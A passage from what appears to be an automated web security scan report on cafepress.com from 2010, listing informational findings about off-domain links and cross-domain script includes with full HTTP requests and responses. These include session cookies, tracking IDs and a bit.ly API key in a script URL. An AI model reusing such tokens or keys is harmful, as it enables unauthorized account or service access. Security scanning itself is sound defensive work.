__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 58685 Date: Sun, 26 Dec 2010 13:44:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58685 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /> </a>...[SNIP]... <li><a href="http://www.mycustomtomtom.com" target="_blank"> custom gps</a>...[SNIP]... </ul><img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/> <div class="clear">...[SNIP]...
4.5. http://www.cafepress.com/cp/info/sell/index.aspx
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/sell/index.aspx
Issue detail
The page was loaded from a URL containing a query string: http://www.cafepress.com/cp/info/sell/index.aspx?area=learn&page=learn
The response contains the following links to other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content7.cpcache.com/css/sell/sellStyles.css
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://www.mycustomtomtom.com/
Request
GET /cp/info/sell/index.aspx?area=learn&page=learn HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 51638 Date: Sun, 26 Dec 2010 13:44:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 51638 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... <meta name="ROBOTS" content="ALL"><link rel="stylesheet" type="text/css" href="http://content7.cpcache.com/css/sell/sellStyles.css" title="style"> <!-- Start Includes -->...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /> </a>...[SNIP]... <li><a href="http://www.mycustomtomtom.com" target="_blank"> custom gps</a>...[SNIP]... </ul><img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/> <div class="clear">...[SNIP]...
4.6. http://www.cafepress.com/cp/moredetails.aspx
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/moredetails.aspx
Issue detail
The page was loaded from a URL containing a query string: http://www.cafepress.com/cp/moredetails.aspx?showBleed=false&ProductNo=299007536
The response contains the following links to other domains:
http://content0.cpcache.com/css/marketplace/searchResults.css
http://content1.cpcache.com/js/import.js
http://content1.cpcache.com/js/jquery/jquery-1.2.6.pack.js
http://content5.cpcache.com/marketplace/img/icon_zoom_in.gif
http://content9.cpcache.com/products/additional_photos/7_1.jpg
http://images6.cpcache.com/product/299007536v4_240x240_Front.jpg
http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg
Request
GET /cp/moredetails.aspx?showBleed=false&ProductNo=299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 5050 Date: Sun, 26 Dec 2010 13:44:58 GMT Content-Length: 5050 Connection: close Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... <META name="robots" content="NoIndex"><link rel="stylesheet" type="text/css" href="http://content0.cpcache.com/css/marketplace/searchResults.css" title="style"> <style type="text/css">...[SNIP]... </script><script type="text/javascript" src="http://content1.cpcache.com/js/jquery/jquery-1.2.6.pack.js"> </script> <script type="text/javascript" src="http://content1.cpcache.com/js/import.js"> </script>...[SNIP]... <td id="displayCell" align="center" valign="middle" style="width:480px;"><img id="image1" src="http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg" width="480"> </td>...[SNIP]... <A href="?productNo=299007536&colorNo=-1&pr=F&showbleed=false&tab=1&Zoom=1"><img id="imgproductfront" height="50" src="http://images6.cpcache.com/product/299007536v4_240x240_Front.jpg" class="image"> </A>...[SNIP]... <a href="javascript:swapimg('image1', 'imgproductinfo1')" onclick="document.getElementById('zoom').style.display = 'none';"><img id="imgproductinfo1" height="50" src=http://content9.cpcache.com/products/additional_photos/7_1.jpg class="image"> </a>...[SNIP]... <A href="?productNo=299007536&pr=&showbleed=false&colorNo=-1&tab=1&Zoom=2"><img src="http://content5.cpcache.com/marketplace/img/icon_zoom_in.gif" border="0"> </A>...[SNIP]...
4.7. http://www.cafepress.com/cp/viewcart.aspx
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/viewcart.aspx
Issue detail
The page was loaded from a URL containing a query string: http://www.cafepress.com/cp/viewcart.aspx?s=search
The response contains the following links to other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content2.cpcache.com/css/marketplace/checkout_all.css
http://content3.cpcache.com/css/marketplace/cartv2.css
http://content3.cpcache.com/js/cartv2.js
http://content6.cpcache.com/js/jquery/thickbox/thickbox-compressed.js
http://content8.cpcache.com/js/jquery/thickbox/thickbox.css
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1025648074/?label=Ji8WCOLp2QEQysuI6QM&guid=ON&script=0
http://www.imiclk.com/cgi/r.cgi?m=3&mid=yy37e4r4&ptid=CRTS
http://www.mycustomtomtom.com/
Request
GET /cp/viewcart.aspx?s=search HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 51145 Date: Sun, 26 Dec 2010 13:44:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:44:53 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Content-Length: 51145 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... <!-- Start Includes --><link rel="STYLESHEET" type="text/css" href="http://content3.cpcache.com/css/marketplace/cartv2.css"> <script type="text/javascript">...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /> </a>...[SNIP]... <li><a href="http://www.mycustomtomtom.com" target="_blank"> custom gps</a>...[SNIP]... </ul><img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/> <div class="clear">...[SNIP]... </script><link rel="stylesheet" type="text/css" href="http://content2.cpcache.com/css/marketplace/checkout_all.css" title="style"> <link rel="stylesheet" href="http://content8.cpcache.com/js/jquery/thickbox/thickbox.css" type="text/css" media="screen" /> <!--[if lte IE 7]>...[SNIP]... <![endif]--><script type="text/javascript" src="http://content6.cpcache.com/js/jquery/thickbox/thickbox-compressed.js"> </script>...[SNIP]... 
</script> Criteo US End--><script type="text/javascript" src="http://content3.cpcache.com/js/cartv2.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <div style="display:inline;"><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1025648074/?label=Ji8WCOLp2QEQysuI6QM&guid=ON&script=0"/> </div>...[SNIP]... </html><IFRAME SRC="http://www.imiclk.com/cgi/r.cgi?m=3&mid=yy37e4r4&ptid=CRTS" FRAMEBORDER="0" SCROLLING="NO" WIDTH="0" HEIGHT="0"> </IFRAME>...[SNIP]...
5. Cross-domain script include
There are 70 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement that a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons), then you should consider reimplementing the script's functionality within your own code.
5.1. http://www.cafepress.com/
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://partner.googleadservices.com/gampad/google_service.js
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; 
cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 75158 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.2. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Issue detail
The response dynamically includes the following scripts from other domains:
http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content9.cpcache.com/js/http_request.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; cppid=5185601; xid=0; jid=0; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; cp-v=D0026F27AADDAF9A26C54608326FC1BA; utm_medium=productfeed; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; __utmb_sweepery=1.2.10.1293371031; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%2C%22referrer%22%3A%22None%22%2C%22viewCount%22%3A1%7D; cp_st=; cp_sc=100178; cppss=3x0; 
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmb-UA-11730150-1=1.2.10.1293371031; __utmc-UA-11730150-1=1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmb-UA-12011589-1=1.2.10.1293371032; __utmc-UA-12011589-1=1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmc=265344797; __utmb=265344797.12.10.1293371029; __cmbDomTm=0; __cmbTpvTm=1392
Response
